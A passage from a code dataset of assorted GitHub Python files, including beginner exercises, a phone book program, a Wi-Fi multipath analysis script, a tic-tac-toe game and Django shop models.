<= 5:\n print ('Number is 5')\nelse:\n print ('Number is not 5')\n# Ternary operator (the value of a will be 7 if the condition is true or 14 if it is false)\na = 3\na = 7 if 3**3 > 9 else 14\nprint (a)\n# For loop\nfor i in range(1,10):\n print(i)\n\nfor i in range(1,10,2): # From 1 to 10 in steps of 2\n print(i)\n\nstring = 'String traversal!'\nfor i in range(len(string)):\n print(string[i])\n\nfor char in string: # Simpler version than above\n print(char)\n# 10 x 10 multiplication\nfor i in range(1,11):\n print ('{:<3}|'.format(i))\n\n# While loop\ncondition = 10\nwhile condition != 0:\n print (condition)\n condition = condition -1\n\nwhile True:\n print (\"Infinite\")\n break\n\nfor i in range (1,11): # Omitting some values\n if i == 5:\n continue\n print(i)\n\n# Functions\n\n\ndef function2():\n print(\"This is our first function!\")\n\nfunction2()\n\n\ndef returning():\n return \"I am a result!\"\n\nresult = returning()\nprint(result)\n\n\ndef multival():\n return \"This is a return value\", 2\n\nprint (multival())\n\n\ndef parameters(a):\n print (a)\nparameters(a=\"This is a parameter\")\n\n\ndef add(y,w):\n c = y + w\n return c\n\nresult = add(12,5)\nprint (result)\n\nresultString = add(\"One\", \"String\")\n\nprint(resultString)\n\n\ndef default_param(a,b=4,c=5):\n return a + b + c\nresult3 = default_param(3)\nprint (result3)\n\n# Scope\n\n\ndef scope(z):\n z = z + 1\n print (z)\n return z\nscope(5)\n\n\ndef outer(a):\n\n def nested(b):\n 
return b * a;\n a = nested(a)\n return a\nprint (outer(4))\n\n\ndef f(a):\n def g(b):\n def h(c):\n return a * b * c\n return h\n return g\nprint (f(5)(2)(3))\n\n# Recursive functions which use themselves over and over again\n\n\ndef factorial(n): # Factorial to Silnia\n if n == 1:\n return 1\n else:\n return n * factorial(n - 1) # 5 * 4 * 3 * 2 * 1\nprint(factorial(5))\n\n\ndef sums(n):\n if n == 1:\n return 1\n else:\n return n + sums(n - 1)\n\n\ndef tail_sum(n, accumulator=0):\n if n == 0:\n return accumulator\n else:\n return tail_sum(n - 1, accumulator+n)\n\nprint (sums(10))\nprint(tail_sum(10))\n\n# Lambda functions\n\n\nf = lambda x, y: x + y\n\nprint(f(2,3))\n\n\nj = lambda a: lambda b: lambda c: a * b * c\n\nprint(j(3)(2)(4))\n\nk = lambda c: lambda w, x: lambda d: (c * (w + x)) % d\n\nprint (k(2)(4, 3)(11))\n\n# Exception handling\n\ntry:\n a = 5/0\nexcept Exception as e:\n print (e)\n\ntry:\n n = int(input(\"Enter an integer: \"))\nexcept ValueError:\n print(\"That is not an integer!\")\n\ntry:\n sumsy = 0\n file = open('numbers.txt', 'r')\n for number in file:\n sumsy = sumsy + 1.0/int(number)\n print(sumsy)\nexcept ZeroDivisionError:\n print (\"Number is divided by zero!\")\nexcept IOError:\n print (\"File DNE\")\n\n# Throwing exceptions\n\na = 'a'\n\n\ndef raiseexception(a):\n if type(a) != type('a'):\n raise ValueError(\"This is not string\")\n\ntry:\n raiseexception(a)\nexcept ValueError as e:\n print(e)\n\n\ndef testcase(a, b):\n assert a < b, \"a is greater than b\"\ntry:\n testcase(2,1)\nexcept AssertionError as e:\n print(e)\n\n# Data input\n\nage = input (\"How old are you?\")\nprint (age)\n\n# File Management open (filename, access(read or write), buffering)\n\nfile = open(\"C:\\\\Users\\\\mkucm\\\\Desktop\\\\lol.txt\", \"r\")\nprint (file.read(4)) # Reads 4 characters from the file\n# print (file.tell()) # Cursor is at the fourth position\nprint (file.seek(6)) # Moves the cursor to the defined position\nprint(file.tell())\nfile.close()\n\n\nfile = open(\"C:\\\\Users\\\\mkucm\\\\Desktop\\\\lol.txt\", \"r\")\nfor line in file:\n print(line) # Writes every line\n\nfile.close()\n\nfile = open(\"C:\\\\Users\\\\mkucm\\\\Desktop\\\\lol.txt\", \"r\")\nprint (\"File Name: \" + file.name)\nprint(\"is closed: \" + str(file.closed))\nprint(\"Mode \" + file.mode)\n\n# Writing to a file w+ = writing and reading\n\n\nfile = open(\"write.txt\", \"w+\")\nfile.write(\"Hello file, I am string!\")\nfile.seek(0)\nfile.write(\"this\") # overwrites the length of this string from the position of seek function\nprint(file.read())\nfile.close()\n\n\n# Data Structure\n\n\ntuple = (1, \"abc\", 2, \"cde\")\ntuple1 = 3, \"efg\", True\ntuple2 = \"A\" # tuple2 = (\"A\",)\nprint(tuple)","repo_name":"GentelmanBastard/PythonCourse","sub_path":"pierwszy/pierwszy.py","file_name":"pierwszy.py","file_ext":"py","file_size_in_byte":5047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10037722170","text":"\nimport argparse\nimport os\nimport pickle\nimport numpy as np\nimport math as mt\nimport scipy.io as sio\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('step_aoa_first', help='Step for the AoA of first path', type=int)\n parser.add_argument('step_aoa_second', help='Step for the AoA of second path', type=int)\n parser.add_argument('max_num_paths', help='Maximum number of paths detected', type=int)\n parser.add_argument('opt_method', help='Optimization routine')\n 
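    # Assuming the six positional arguments declared in this block, a typical
    # invocation would look like the following (values are hypothetical,
    # except 'omp', which this script explicitly recognizes further below):
    #
    #     python analysis_from_python_methods.py 2 5 4 omp ../simulations/ simulation
    #
    # i.e. step_aoa_first=2, step_aoa_second=5, max_num_paths=4,
    # opt_method='omp', then the experiment directory and the ToA name base.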
parser.add_argument('exp_dir', help='Name base of the directory')\n parser.add_argument('name_base', help='Name base of the simulation ToA')\n args = parser.parse_args()\n\n exp_dir = args.exp_dir\n name_base = args.name_base # simulation\n print(name_base)\n\n step_aoa_first = args.step_aoa_first\n aoa_fist_array = np.arange(-90, 90, step_aoa_first)\n num_aoa_first = aoa_fist_array.shape[0]\n\n path_find = np.zeros((180, args.max_num_paths + 1))\n # in the last column we have the number of times all the paths are identified\n estim_toa_error = np.zeros((180, args.max_num_paths))\n estim_aoa_error = np.zeros((180, args.max_num_paths))\n counter = np.zeros((180, 1)) # to then average the results\n execution_times = np.zeros((180, 1))\n\n toa_sep_threshold_first = 5e-9\n toa_sep_threshold = 5e-9\n aoa_sep_threshold = 40\n\n for aoa_second in range(-90, 91, args.step_aoa_second):\n\n name_file = exp_dir + 'CFR_' + name_base + '_aoaobst_' + str(aoa_second) + '.mat'\n csi_buff = sio.loadmat(name_file)\n signal_complete = (csi_buff['CFR'])\n\n name_file = exp_dir + 'delay_' + name_base + '_aoaobst_' + str(aoa_second) + '.mat'\n csi_buff = sio.loadmat(name_file)\n delays_sim = (csi_buff['propagation_delays'])\n\n name_file = exp_dir + 'aoa_' + name_base + '_aoaobst_' + str(aoa_second) + '.mat'\n csi_buff = sio.loadmat(name_file)\n aoa_sim = (csi_buff['propagation_aoa'])\n\n name_file = exp_dir + 'path_loss_' + name_base + '_aoaobst_' + str(aoa_second) + '.mat'\n try:\n csi_buff = sio.loadmat(name_file)\n path_loss_sim = (csi_buff['propagation_path_loss'])\n except FileNotFoundError:\n path_loss_sim = None\n\n # open results optimization\n save_dir = '../results/' + args.opt_method + '/'\n name_file = save_dir + 'paths_amplitude_list_' + name_base + '_aoaobst_' + str(aoa_second) + '.txt'\n try:\n with open(name_file, \"rb\") as fp: # Pickling\n paths_amplitude_list = pickle.load(fp)\n name_file = save_dir + 'paths_aoa_list_' + name_base + '_aoaobst_' + str(aoa_second) + '.txt'\n with open(name_file, \"rb\") as fp: # Pickling\n paths_aoa_list = pickle.load(fp)\n name_file = save_dir + 'paths_toa_list_' + name_base + '_aoaobst_' + str(aoa_second) + '.txt'\n with open(name_file, \"rb\") as fp: # Pickling\n paths_toa_list = pickle.load(fp)\n except FileNotFoundError:\n print('file not found', name_file)\n continue\n try:\n name_file = save_dir + 'opr_sim_' + name_base + '_aoaobst_' + str(aoa_second) + '.npz'\n save_dct = np.load(name_file, allow_pickle=True)\n execution_time = save_dct['opt_times']\n except FileNotFoundError:\n try:\n name_file = save_dir + 'opr_sim_' + name_base + '_aoaobst_' + str(aoa_second) + '.txt'\n with open(name_file, \"rb\") as fp:\n execution_time = pickle.load(fp)\n except FileNotFoundError:\n execution_time = np.nan*np.ones(len(paths_toa_list))\n\n # parameters\n n_tot = 4\n F_frequency = 256\n delta_f = 312.5E3\n delete_idxs = np.asarray([0, 1, 2, 3, 4, 5, 25, 53, 89, 117, 127, 128, 129, 139, 167, 203, 231, 251, 252, 253,\n 254, 255], dtype=int)\n frequency_vector_idx = np.arange(F_frequency)\n frequency_vector_complete = delta_f * (frequency_vector_idx - F_frequency / 2)\n frequency_vector_idx = np.delete(frequency_vector_idx, delete_idxs, axis=0)\n frequency_vector = np.delete(frequency_vector_complete, delete_idxs, axis=0)\n T = 1 / delta_f\n\n for aoa_idx_first in range(num_aoa_first):\n aoa_first = aoa_fist_array[aoa_idx_first]\n\n # RESULTS OF OPTIMIZATION\n paths_refined_amplitude_array = paths_amplitude_list[aoa_idx_first]\n paths_refined_aoa_array = 
paths_aoa_list[aoa_idx_first]\n if args.opt_method == 'iht' or args.opt_method == 'omp':\n paths_refined_aoa_array = -paths_refined_aoa_array\n paths_refined_toa_array = paths_toa_list[aoa_idx_first]\n\n if paths_refined_amplitude_array.shape[0] > 0:\n delete_idxs = np.argwhere(np.abs(paths_refined_amplitude_array) <\n np.max(np.abs(paths_refined_amplitude_array))/5)\n if delete_idxs.shape[0] > 0:\n paths_refined_amplitude_array = np.delete(paths_refined_amplitude_array, delete_idxs[:, 0])\n paths_refined_aoa_array = np.delete(paths_refined_aoa_array, delete_idxs[:, 0])\n paths_refined_toa_array = np.delete(paths_refined_toa_array, delete_idxs[:, 0])\n sorted_idx = np.argsort(np.abs(paths_refined_toa_array))\n\n paths_refined_amplitude_array_sorted = paths_refined_amplitude_array[sorted_idx]\n paths_refined_aoa_array_sorted = paths_refined_aoa_array[sorted_idx]\n paths_refined_toa_array_sorted = paths_refined_toa_array[sorted_idx]\n\n # GROUND TRUTH SIMULATION\n if path_loss_sim is not None:\n sorted_idx_sim = np.argsort(abs(path_loss_sim[0, aoa_idx_first]))[0, :]\n else:\n sorted_idx_sim = np.arange(2)\n\n azimuth_sorted_sim = (aoa_sim[0, aoa_idx_first][0, sorted_idx_sim])\n if aoa_sim.shape[0] > 1:\n elevation_sorted_sim = (aoa_sim[0, aoa_idx_first][1, sorted_idx_sim])\n azimuth_sorted_sim_2 = np.arcsin(np.sin(azimuth_sorted_sim / 180 * mt.pi)\n * np.cos(elevation_sorted_sim / 180 * mt.pi)) * 180 / mt.pi\n else:\n azimuth_sorted_sim_2 = np.copy(np.asarray(-180+azimuth_sorted_sim, dtype='int16'))\n\n az_positive = azimuth_sorted_sim_2 > 0\n az_negative = azimuth_sorted_sim_2 < 0\n azimuth_sorted_sim_2[az_positive] -= 180\n azimuth_sorted_sim_2[az_negative] += 180\n\n swap_idx_pos = azimuth_sorted_sim_2 > 90\n swap_idx_neg = azimuth_sorted_sim_2 < -90\n azimuth_sorted_sim_2[swap_idx_pos] = 180 - azimuth_sorted_sim_2[swap_idx_pos]\n azimuth_sorted_sim_2[swap_idx_neg] = - 180 - azimuth_sorted_sim_2[swap_idx_neg]\n\n times_sorted_sim = delays_sim[0, aoa_idx_first][:, sorted_idx_sim]\n # times_sorted_sim = times_sorted_sim - times_sorted_sim[0, 0]\n if path_loss_sim is not None:\n path_loss_sorted_sim = path_loss_sim[0, aoa_idx_first][:, sorted_idx_sim]\n else:\n path_loss_sorted_sim = None\n\n aoa_first_true = int(np.round(azimuth_sorted_sim_2[0], 1))\n aoa_second_true = int(np.round(azimuth_sorted_sim_2[1]))\n diff_aoa_first_second = mt.floor(aoa_first_true - azimuth_sorted_sim_2[1])\n aoa_idx_diff = diff_aoa_first_second\n if aoa_first_true * aoa_second_true > 0:\n pass\n elif aoa_first_true >= 0: # and consequently aoa_second < 0\n if diff_aoa_first_second >= 90:\n aoa_idx_diff = - (90 - aoa_first_true + 90 + aoa_second_true)\n else: # consequently aoa_first < 0 and aoa_second > 0\n if diff_aoa_first_second < - 90:\n aoa_idx_diff = 90 - aoa_second_true + 90 + aoa_first_true\n\n # print(aoa_idx_diff)\n aoa_idx_diff += 90\n\n # Check if paths have been separated and if yes the error of the identification\n paths_found = 0\n for path_idx in range(times_sorted_sim.shape[1]):\n toa_diff = abs(paths_refined_toa_array_sorted - times_sorted_sim[0, path_idx])\n aoa_diff = abs(paths_refined_aoa_array_sorted - azimuth_sorted_sim_2[path_idx])\n aoa_diff = np.minimum(aoa_diff, 180-aoa_diff)\n\n if path_idx > 0:\n toa_below_threshold = set(np.argwhere(toa_diff < toa_sep_threshold)[:, 0])\n aoa_below_threshold = set(np.argwhere(aoa_diff < aoa_sep_threshold)[:, 0])\n else:\n toa_below_threshold = set(np.argwhere(toa_diff < toa_sep_threshold_first)[:, 0])\n aoa_below_threshold = set(np.argwhere(aoa_diff < 
aoa_sep_threshold)[:, 0])\n path_set_estim = toa_below_threshold.intersection(aoa_below_threshold)\n path_set_estim = list(path_set_estim)\n\n if path_set_estim:\n paths_found += 1\n path_idx_estim = min(path_set_estim) # select the strongest path among the compatible ones\n estim_toa_error[aoa_idx_diff, path_idx] += toa_diff[path_idx_estim]\n estim_aoa_error[aoa_idx_diff, path_idx] += aoa_diff[path_idx_estim]\n\n paths_refined_toa_array_sorted = paths_refined_toa_array_sorted - paths_refined_toa_array_sorted[path_idx_estim]\n times_sorted_sim = times_sorted_sim - times_sorted_sim[0, path_idx]\n\n paths_refined_toa_array_sorted = np.delete(paths_refined_toa_array_sorted, path_idx_estim)\n paths_refined_aoa_array_sorted = np.delete(paths_refined_aoa_array_sorted, path_idx_estim)\n path_find[aoa_idx_diff, path_idx] += 1\n if paths_found == times_sorted_sim.shape[1]:\n path_find[aoa_idx_diff, path_idx + 1] += 1\n counter[aoa_idx_diff] += 1\n\n execution_times[aoa_idx_diff] += execution_time[aoa_idx_first]\n\n print(counter[:, 0])\n path_find_avg = np.divide(path_find, counter)\n execution_times_avg = np.divide(execution_times, counter)\n estim_toa_error_avg = np.divide(estim_toa_error, path_find[:, :-1])\n estim_aoa_error_avg = np.divide(estim_aoa_error, path_find[:, :-1])\n\n save_dir = '../results/processed_' + args.opt_method + '/'\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n\n name_file = save_dir + 'path_find_avg_' + name_base + '.txt'\n with open(name_file, \"wb\") as fp: # Pickling\n pickle.dump(path_find_avg, fp)\n name_file = save_dir + 'computing_time_avg_' + name_base + '.txt'\n with open(name_file, \"wb\") as fp: # Pickling\n pickle.dump(execution_times_avg, fp)\n\n name_file = save_dir + 'estim_toa_error_avg_' + name_base + '.txt'\n with open(name_file, \"wb\") as fp: # Pickling\n pickle.dump(estim_toa_error_avg, fp)\n name_file = save_dir + 'estim_aoa_error_avg_' + name_base + '.txt'\n with open(name_file, \"wb\") as fp: # Pickling\n pickle.dump(estim_aoa_error_avg, fp)\n","repo_name":"francescamen/Wi-Fi-multipath-parameter-estimation","sub_path":"Python_code/analysis_from_python_methods.py","file_name":"analysis_from_python_methods.py","file_ext":"py","file_size_in_byte":11342,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"38814083345","text":"import sys\n\"\"\"Phone book program\"\"\"\n\n\"\"\"varebiles\"\"\"\nforce_input = ['force_quit', 'fq', 'force_back', 'fb']\nmain_menu_options = ['Q', '1', '2', '3', '4']\ny_n_option = ['y', 'n']\nsearch_menu_options = ['1', '2', '3', 'Q', 'B']\n\"\"\" dictionary \"book\" is an temporary solution, will be replaced by save/read file feature\"\"\"\nbook = {\n 0: {'First Name': '_', 'Second Name': '_', 'Age': '_', 'Phone Number': '_', 'City': '_', 'Postal Code': '_',\n 'Street': '_'},\n 1: {'First Name': 'Adam', 'Second Name': 'ASDF', 'Age': '35', 'Phone Number': '_',\n 'City': '_', 'Postal Code': '_',\n 'Street': '_'},\n 2: {'First Name': 'Aleksandra', 'Second Name': 'QWE', 'Age': '31', 'Phone Number': '_',\n 'City': '_', 'Postal Code': '_',\n 'Street': '_'},\n 3: {'First Name': 'Sebastian', 'Second Name': 'Sza', 'Age': '31', 'Phone Number': '_',\n 'City': '_', 'Postal Code': '_',\n 'Street': '_'},\n 4: {'First Name': 'Adam', 'Second Name': 'Sza', 'Age': '51', 'Phone Number': '_',\n 'City': '_', 'Postal Code': '_', 'Street': '_'},\n }\n\n\"\"\"Functions\"\"\"\n\n#under construct - option to skip adding values\n# def force(user_input=\"\"):\n# if user_input in 
force():\n# if user_input == 'force_quit':\n# print(\"Bye!\")\n# sys.exit()\n# elif user_input == 'fq':\n# print(\"Bye!\")\n# sys.exit()\n# elif user_input == 'force_back':\n# print(\"going back to main menu\")\n# elif user_input == 'fb':\n# print(\"going back to main menu\")\n\n\ndef delete_entry():\n \"\"\"Deletes an entry from the book dict based on a user-provided ID,\n with confirmation and wrong-input protection\"\"\"\n d_id = int(input(\"Provide ID to delete:\\n\"))\n if d_id in book:\n d_conf = input(f\"Do you really wanna delete:\\n {book[d_id]}?\\n (y/n):\\n\").lower()\n if d_conf in y_n_option:\n if d_conf == 'y':\n del book[d_id]\n print(f\"{d_id} successfully deleted!\")\n else:\n main_menu()\n else:\n wrong_input()\n else:\n print(f\"there is no entry with id {d_id}\")\n wrong_input()\n\n\ndef search():\n \"\"\"Search module: looks for the value in every nested dictionary and returns the key of the parent dictionary,\n allowing the program to print the full data of the entry\"\"\"\n search_result = [] #storage of \"parent dictionaries\"\n search_data = input(\"Provide data to find: \\n\")\n for i in book:\n for k in book[i].items():\n if k[1] == search_data:\n search_result.append(i)\n\n for i in search_result:\n print(book[i])\n\n\ndef search_menu():\n \"\"\"Choose-action menu; according to the input string: 1 - print the whole dictionary, 2 - length of the dictionary,\n 3 - data search, Q - quit, B - back to main menu\"\"\"\n search_menu_input = input(\"Choose action:\\n\"\n \"1 - show whole list\\n2 - len of list\\n3 - search data \\n\"\n \"Q - quit\\nB - Back to main menu\\n\\nYour choice:\\n\").upper()\n if search_menu_input in search_menu_options:\n if search_menu_input == 'Q':\n print('sys exit search menu')\n sys.exit()\n elif search_menu_input == 'B':\n print(\"Going back to main menu\")\n main_menu()\n elif search_menu_input == '1':\n for book_id, book_info in book.items():\n print(\"\\nBook ID:\", book_id)\n for key in book_info:\n print(key + \":\", book_info[key])\n print(\"\\n\\n\")\n search_menu()\n elif search_menu_input == '2':\n print(f\"Your phone book list has {len(book)} entry(ies)\\n\")\n search_menu()\n elif search_menu_input == '3':\n search()\n search_menu()\n else:\n wrong_input()\n\n\ndef wrong_input():\n \"\"\"Module which shows the 'wrong input' message to the user\"\"\"\n print(\"Invalid input provided, do you want continue(y/n): \\n\")\n user_input = input().lower()\n if user_input in y_n_option:\n if user_input == 'y':\n main_menu()\n else:\n print(\"Bye!\")\n sys.exit()\n else:\n wrong_input()\n\n\ndef print_book():\n \"\"\"Module which prints the address book line by line\"\"\"\n for line in book:\n print(line, book[line])\n\n\ndef entry():\n \"\"\"\n Function \"ENTRY\" is responsible for adding a single entry to the \"book\" dictionary, which is currently my \"database\".\n Variables first_name/second_name/phone_number/etc. hold exactly what their names say.\n \"\"\"\n\n first_name = input(\"Provide first name: \\n\")\n# force(first_name)\n second_name = input(\"Provide second name: \\n\")\n# force(second_name)\n age = input(\"Provide Age: \\n\")\n# force(age)\n phone_number = input(\"Provide phone number: \\n\")\n# force(phone_number)\n city = input(\"Provide city: \\n\")\n# force(city)\n postal_code = input(\"Provide postal code: \\n\")\n# force(postal_code)\n street = input(\"Provide street: \\n\")\n# force(street)\n\n if first_name == second_name == phone_number == age == city == postal_code == street == \"\":\n # check if the user provided nothing for all 7 fields; if so, 
just pass\n print(\"No entry data provided\")\n pass\n elif first_name in book and second_name in book and age in book and phone_number in book and city in book \\\n and postal_code in book and street in book:\n print(\"Mentioned user already exist\")\n user_already_exist = input(\"Do you want continue(y/n): \\n\").lower()\n if user_already_exist == 'y':\n entry()\n else:\n pass\n\n else:\n book[len(book)] = {'First Name': first_name, 'Second Name': second_name, 'Age': age,\n 'Phone Number': phone_number, 'City': city, 'Postal Code': postal_code,\n 'Street': street}\n\n\ndef main_menu():\n \"\"\"Main menu\"\"\"\n user_first_input = input(\"Q - Quit\\n1 - search menu\\n2 - append menu\\n3 - \"\n \"delete menu\\n YOUR CHOICE (Q/1/2/3):\\n\").upper()\n if user_first_input not in main_menu_options:\n wrong_input()\n\n elif user_first_input == 'Q':\n print(\"sys exit in main_menu=>user_first_input = Q\")\n sys.exit()\n elif user_first_input == '1':\n search_menu()\n elif user_first_input == '2':\n entry()\n print_book()\n main_menu()\n elif user_first_input == '3':\n delete_entry()\n main_menu()\n else:\n main_menu()\n\n\n\"\"\"Executive part\"\"\"\nmain_menu()\n","repo_name":"Sewi1808/ISA_KursPython3KRK","sub_path":"day_6/homework/Homework_nested_dictionary_attempt.py","file_name":"Homework_nested_dictionary_attempt.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38696844979","text":"from time import time\nfrom Iterables import Iterables\n\nclass Block(Iterables):\n \"\"\"\n This class manages the blocks in the blockchain.\n \n Attributes:\n previous_hash: Hash of the previous block.\n index: Index of the block.\n transactions: Transactions in a block.\n proof: Proof number of the block.\n timestamp: Timestamp of the block.\n \"\"\"\n def __init__(self, previous_hash, index, transactions, proof, timestamp=time()):\n \"\"\"\n This function initialise a Block in blockchain.\n\n Attributes:\n previous_hash: Hash of the previous block.\n index: Index of the block.\n transactions: Transactions in a block.\n proof: Proof number of the block.\n timestamp: Timestamp of the block.\n \"\"\"\n self.previous_hash = previous_hash\n self.index = index\n self.transactions = transactions\n self.proof = proof\n self.timestamp = timestamp","repo_name":"zaidK1007/Blockchain","sub_path":"Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"12779442799","text":"import datetime\n# print(datetime.datetime.now())\n# 2021-12-15 15:12:18.023355\nn = 5\nnumbers = [8,3,7,9,2,11,45,111,45,88,1,125,61,888,25,99]\nm = 3\ntargets = [5,7,9,88,89,887]\nres = []\nnumbers.sort()\nprint(numbers)\nfor target in targets:\n check = 'no'\n first = 0\n last = len(numbers) - 1\n # print('target',target)\n while first <= last:\n mid = (first+last)//2\n # print('mid',mid)\n if target == numbers[mid]:\n check = 'yes'\n break\n elif target < numbers[mid]:\n last = mid-1\n else:\n first = mid+1\n\n res.append(check)\n\nprint(res)\n# print(datetime.datetime.now())\n# 2021-12-15 15:22:53.256103","repo_name":"ggaem97/study","sub_path":"2021-12-15/binarySearch_.py","file_name":"binarySearch_.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39752048506","text":"from PyQt4.QtCore import *\n\n# to bring new 
PyQt functionality - make wrapper\nclass QDateTimeM(QDateTime):\n    def __init__(self, parent=None):\n        super(QDateTimeM, self).__init__(QDateTime().currentDateTime())\n\n    def toMSecsSinceEpoch(self):\n        time = self.time()\n        return int((float(self.toTime_t())+float(time.msec())/1000)*1000)\n    \n\nif __name__=='__main__':\n\tqdt = QDateTimeM()\n\tprint(qdt.toMSecsSinceEpoch())\n","repo_name":"DESY-Petra-III/P02","sub_path":"P02.2/_stage/resistive_heating/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"13792375851","text":"from board import *\nimport os\nprint(\"Welcome to your doom\")\n\ndef clear():\n    os.system('clear')\n\ninputFine = False\nwhile not inputFine:\n    hCh = input(\"Choose your poison (X/O)\")\n    if hCh in ['x', 'X', 'o', 'O']:\n        inputFine = True\n    else:\n        print(\"abbey 2 year old READ\")\nboard_obj = Board(hCh)\n\ninputFine = False\n\nwhile not inputFine:\n    stFirst = input(\"Would you like to start first?\")\n    if stFirst in ['y', 'Y', 'n', 'N']:\n        inputFine = True\n    else:\n        print(\"abbey 2 year old READ\")\naiGo = False\nif stFirst in ['n', 'N']:\n    aiGo = True\n\ngameOver = False\ntotMoves = 0\nchkRet = 0\nwhile not gameOver and totMoves < 10:\n    if aiGo:\n        board_obj.aiTurn()\n        totMoves += 1 \n        aiGo = False\n    clear()\n    board_obj.show()\n    humanDumb = True\n\n    while humanDumb:\n        try:\n            inp = int(input(\"please give input: \"))\n        except (EOFError, KeyboardInterrupt):\n            print('Bye')\n            exit()\n        except (KeyError, ValueError):\n            print('Bad choice')\n            continue\n        ret = board_obj.humanInput(inp)\n        \n        if ret == 1:\n            humanDumb = False\n            totMoves += 1 \n        else: \n            print(\"you absolute numbskull!, try again\")\n    print(\"hihi\")\n\n    chkRet = board_obj.checkWin()\n    if chkRet > 0:\n        break\n    board_obj.aiTurn() \n    totMoves += 1 \n\n    chkRet = board_obj.checkWin()\n    if chkRet > 0:\n        break\nclear()\nboard_obj.show()\nif chkRet == 0:\n    print(\"tie\")\nelif chkRet == AI:\n    print(\"AI\")\nelse:\n    print(\"HUMAN\")\n","repo_name":"saru-d2/tictactoe-minimax","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
{"seq_id":"10436345194","text":"import datetime\nimport os\nfrom django.utils.text import slugify\nfrom django.contrib.auth.models import User\nfrom django.db import models\n# Create your models here.\n\nfrom django.db.models import Avg\n\n\ndef get_client_rating(client_id):\n    rating = Rating.objects.filter(client_id=client_id).aggregate(\n        Avg('rating'))['rating__avg']\n    return rating\n\n\ndef get_file_path(instance, filename):\n    # Django passes the model instance as the first argument to upload_to callables\n    original_filename = filename\n    nowTime = datetime.datetime.now().strftime('%Y%m%d%H:%M:%S')\n    filename = \"%s%s\" % (nowTime, original_filename)\n    return os.path.join('uploads/', filename)\n\n\nclass Category(models.Model):\n    name = models.CharField(\n        max_length=150,\n        db_index=True,\n        verbose_name='Имя категории'\n    )\n    slug = models.SlugField(\n        max_length=150,\n        unique=True,\n        verbose_name='Слаг')\n    image = models.ImageField(\n        upload_to=get_file_path,\n        null=True,\n        blank=True,\n        verbose_name='Изображение Категории')\n    description = models.TextField(\n        max_length=500,\n        null=False,\n        blank=False,\n        verbose_name='Описание Категории ')\n    status = models.BooleanField(\n        default=False,\n        verbose_name='Статус Категории ')\n    trending = models.BooleanField(\n        default=False,\n        verbose_name='В тренде')\n    created_at = 
models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n    class Meta:\n        verbose_name = 'Категория'\n        verbose_name_plural = 'Категории'\n\n    def __str__(self):\n        return self.name\n\n    def save(self, *args, **kwargs):\n        if not self.slug:\n            self.slug = slugify(self.name)  # the model's field is 'name', not 'title'\n        super().save(*args, **kwargs)\n\n\nclass Product(models.Model):\n    category = models.ForeignKey(\n        Category,\n        on_delete=models.CASCADE,\n        verbose_name='Категория')\n    name = models.CharField(\n        max_length=150,\n        null=False,\n        blank=False,\n        verbose_name='Имя товара')\n    slug = models.SlugField(\n        max_length=150,\n        db_index=True,\n        verbose_name='Слаг')\n    sender_name = models.CharField(\n        max_length=150,\n        null=False,\n        blank=False,\n        verbose_name='Отправитель товара')\n    product_image = models.ImageField(\n        upload_to=get_file_path,\n        null=True,\n        blank=True,\n        verbose_name='Изображение продукта')\n    description = models.TextField(\n        max_length=500,\n        null=False,\n        blank=False,\n        verbose_name='Описание')\n    first_price = models.FloatField(\n        null=False,\n        blank=False,\n        verbose_name='За сколько вы купили?')\n    selling_price = models.FloatField(\n        null=False, blank=False, verbose_name='Цена продажи')\n    status = models.BooleanField(\n        default=False,\n        verbose_name='Статус')\n    trending = models.BooleanField(\n        default=False,\n        verbose_name='В тренде')\n    tag = models.CharField(\n        max_length=150,\n        null=False,\n        blank=False,\n        verbose_name='Тег')\n    created_at = models.DateTimeField(\n        auto_now_add=True,\n        verbose_name='Дата добавление')\n\n    class Meta:\n        verbose_name = 'Продукты'\n        verbose_name_plural = 'Продукты'\n        index_together = (('id', 'slug'),)\n\n    def __str__(self):\n        return self.name\n\n\nclass Size(models.Model):\n    product = models.ForeignKey(to=Product, on_delete=models.CASCADE, verbose_name='Имя товара')\n    size = models.PositiveIntegerField(verbose_name='Размер товара')\n    quantity = models.PositiveIntegerField(verbose_name='Штук товара')\n\n    class Meta:\n        verbose_name = 'Размер'\n        verbose_name_plural = 'Размеры'\n\n\nclass Cart(models.Model):\n    user = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        verbose_name='Пользователь')\n    product = models.ForeignKey(\n        Product,\n        on_delete=models.CASCADE,\n        verbose_name='Товар')\n    quantity = models.PositiveIntegerField(default=1)\n    size = models.PositiveIntegerField()\n    created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n\nclass Wishlist(models.Model):\n    user = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        verbose_name='Пользователь')\n    product = models.ForeignKey(\n        Product,\n        on_delete=models.CASCADE,\n        verbose_name='Товар')\n    created_at = models.DateTimeField(auto_now_add=True, verbose_name='Время')\n\n\nclass Order(models.Model):\n    user = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        verbose_name='Пользователь')\n    orderstatuses = (\n        ('В ожидании', 'В ожидании'),\n        ('Для доставки', 'Для доставки'),\n        ('Заказ отправлен', 'Заказ отправлен'),\n    )\n    status = models.CharField(\n        default='В ожидании',\n        max_length=150,\n        choices=orderstatuses,\n        verbose_name='Статус')\n    fname = models.CharField(max_length=150, null=False, verbose_name='Имя')\n    # lname = models.CharField(\n    #     max_length=150,\n    #     null=False,\n    #     verbose_name='Фамилия')\n    # email = 